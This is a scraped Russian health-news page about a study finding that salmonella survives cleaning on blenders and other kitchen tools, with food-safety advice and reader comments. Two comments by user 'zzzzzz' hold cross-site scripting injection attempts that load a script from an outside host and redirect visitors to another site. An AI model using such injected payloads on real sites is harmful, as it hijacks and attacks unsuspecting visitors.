Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Блендеры и миксеры таят в...  >>  Блендеры и миксеры таят в себе страшного микроба, от которого не могут избавиться никакие средства! Что делать?
 
Обратная связь
 

Блендеры и миксеры таят в себе страшного микроба, от которого не могут избавиться никакие средства! Что делать?

Размер шрифта
04 сентября 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Если мы готовим дома, кухонный комбайн мы используем довольно часто. Возможно, это даже устройство номер один на каждой кухне. Однако согласно новому исследованию, его наличие в доме может привести к распространению опасных бактерий – сальмонелл.

Обычные предметы вызывают прыщи у взрослых!

Ученые из Ирландии хотели установить, как именно сальмонелла оказывается на предметах в кухне, а также как от нее можно избавиться, если вообще возможно. И результаты их работы очень расстроят всех любителей кухонных комбайнов.

Ученые использовали три различных дезинфицирующих вещества, чтобы убрать бактерий с твердой поверхности, и со всеми тремя они потерпели неудачу – избавиться от сальмонелл было невозможно!

Многие люди, готовящие дома, используют обычное моющее средство и кухонное полотенце, чтобы очищать разделочные доски, кухонные комбайны и другую кухонную утварь, которая находилась в контакте с сырым мясом и птицей. Но лишь мытья и ополаскивания недостаточно, чтобы уничтожить сальмонелл, которые могут быть перенесены на кухонные приборы. А это делает возможным возникновение вспышки сальмонеллезной инфекции.

Одна из причин, по которой Департамент сельского хозяйства США не рекомендует людям мыть бройлеров до того, как их приготовить, состоит в том, что во время мытья бактерии будут попадать на все поверхности в кухне, которые, как показали ученые, очистить от бактерий очень сложно или же вообще невозможно.

Это исследование также помогает объяснить загадку вспышки сальмонеллеза в 10 европейских странах в прошлом году, из-за которой 160 человек слегли с гастроэнтеритом. Это случилось из-за того, что на предприятии по переработке мяса уже приготовленное мясо было заражено от сырого, обрабатывавшегося там же. Это привело в замешательство работников здравоохранения, которые предположили, что возможно существует некая суперсальмонелла, бактерия, которая может выживать в уже приготовленной еде и заражать другие продукты. Но исследование показало, что такую способность демонстрируют все сальмонеллы без исключения.

В то время как продуктовые предприятия обычно подчиняются строгим правилам, чтобы обеспечить должное качество обработки еды, люди, которые готовят дома, должны быть лучше осведомлены об опасности сальмонелл, из-за которых каждый год происходит около 23 000 госпитализаций и около 500 смертей. Эта бактерия может поселиться на любой поверхности на кухне – вашей разделочной доске, кухонном столе, кухонном комбайне – и остаться там.

Чтобы предотвратить такие распространяющиеся через еду заболевания, как сальмонеллез, необходимо следовать мерам предосторожности:

  • держите сырые, еще не приготовленные продукты в определенном месте на кухне и не кладите туда уже приготовленные блюда;
  • используйте разную посуду для сырых и уже приготовленных продуктов;
  • подвергайте всю еду должной термической обработке, никаких полусырых блюд.

Не дайте этим новостям лишить себя радости о приготовления новых блюд. Все это значит только, что когда вы примеряете на себя роль шеф-повара – будьте осторожны и бдительны.

Все о вашем доме в нашем специальном проекте!

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - his shadow

13 сентября 2014 в 14:12

Цитировать   |   Пожаловаться

На этот раз не британские, так ирландские учёные проявили свой талант в раздаче "умных" советов..

Может- всю посуду из кухни исключить, а так же стол, ведь на него могут попасть брызги бог знает чего с сальмонеллой, столовые приборы, да всё....или каждый раз после мытья прокаливать в духовом шкафу?

his shadow 13 сентября 2014 в 14:12
Может- всю посуду из кухни исключить, а так же стол, ведь на него могут попасть брызги бог знает чего с сальмонеллой, столовые приборы, да всё....или каждый раз после мытья прокаливать в духовом шкафу?
 Ну, Вы уж как-то радикально все поняли .. Горячиться не стоит, но гигиена  по-прежнему остается "королевой профилактики", что тут поделаешь. .

3 - his shadow

26 января 2015 в 10:14

Цитировать   |   Пожаловаться

Повторы пошли...опять статейки британских учёных.
И да???
Нам Малышева советовала в посудомойке сапоги мыть...а вы со своими мясорубками.
Этот поток сознания остановится?

4 - zzzzzz

30 июня 2015 в 18:33

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

5 - zzzzzz

30 июня 2015 в 22:29

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Может ли кошка отправить вас в операционную?   Домашние собаки не дадут ребенку стать аллергиком   Лучше всего грудное   Профессионал на вашей кухне  
03 октября 2013Результаты благотворительного марафона «Всем миром» 08 июля 2013Теперь можно выбрать, какой ребенок у вас будет! ЭКО открывает новые горизонты
 
18 июня 2013Повезло, живете в пешей доступности от шоссе? Не так быстро! Чем ближе к шоссе, тем больнее почки! Как защитить себя? 12 июня 2013Обычный шум может вызвать остановку сердца! Как избежать этого?
 

Слайдшоу

1
Можно ли защитить ребенка от микробов
Вы задохнетесь у себя дома, если не сделаете этого!
Что с моим ртом?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.